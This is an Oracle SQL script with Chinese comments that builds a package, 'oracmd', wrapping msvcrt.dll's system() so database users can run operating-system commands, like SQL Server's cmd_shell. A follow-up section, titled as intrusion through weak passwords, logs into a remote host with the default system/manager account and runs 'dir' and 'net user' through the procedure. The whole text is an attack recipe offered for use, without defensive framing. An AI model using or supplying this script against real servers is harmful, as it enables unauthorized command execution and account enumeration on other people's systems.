--?----------------------------------------------------------------------------
--?SQL?server下可以通過cmd_shell調(diào)用系統(tǒng)命令，其實Oracle下也可以。
--這個SQL就是建立一個類似于sql?Server下cmd_shell的過程。
--?----------------------------------------------------------------------------
--????????????????????????????windows下的cmd_shell????????????????
--????????????在win2k下的oracle817測試成功??????????????????????
--???????????????????????????benjurry@xfocus.org????????????????????????????
--?????使用方法：
--1、以dba?權(quán)限用sqlplus登陸oracle，
--2、假設這個文件放在d:\win_oracmd.sql,則在SQLplus中輸入：@d:\win_oracmd.sql?
--3、在sqlplus下輸入?exec?oracmd.exec?('dir?>?c:\dir.txt');???????????????????????????????????????????????????????????????????
--?----------------------------------------------------------------------------
CREATE?OR?REPLACE?LIBRARY?exec_shell?AS?'C:\winnt\system32\msvcrt.dll';?
/
show?errors?
CREATE?OR?REPLACE?PACKAGE?oracmd?IS?PROCEDURE?exec?(cmdstring?IN?CHAR);
end?oracmd;?
/
show?errors?
CREATE?OR?REPLACE?PACKAGE?BODY?oracmd?IS?
PROCEDURE?exec(cmdstring?IN?CHAR)?
IS?EXTERNAL?
NAME?"system"?
LIBRARY?exec_shell?
LANGUAGE?C;
end?oracmd;
/
show?errors

補充：

利用弱口令進行入侵:
C:\>sqlplus /nolog
SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)(port=1521)))(connect_data=(SERVICE_NAME=ora9i)));


SQL> exec oracmd.exec ('dir >c:\dir.txt');
PL/SQL 過程已成功完成。
SQL> exec oracmd.exec ('net user >d:\cmd.txt');
PL/SQL 過程已成功完成。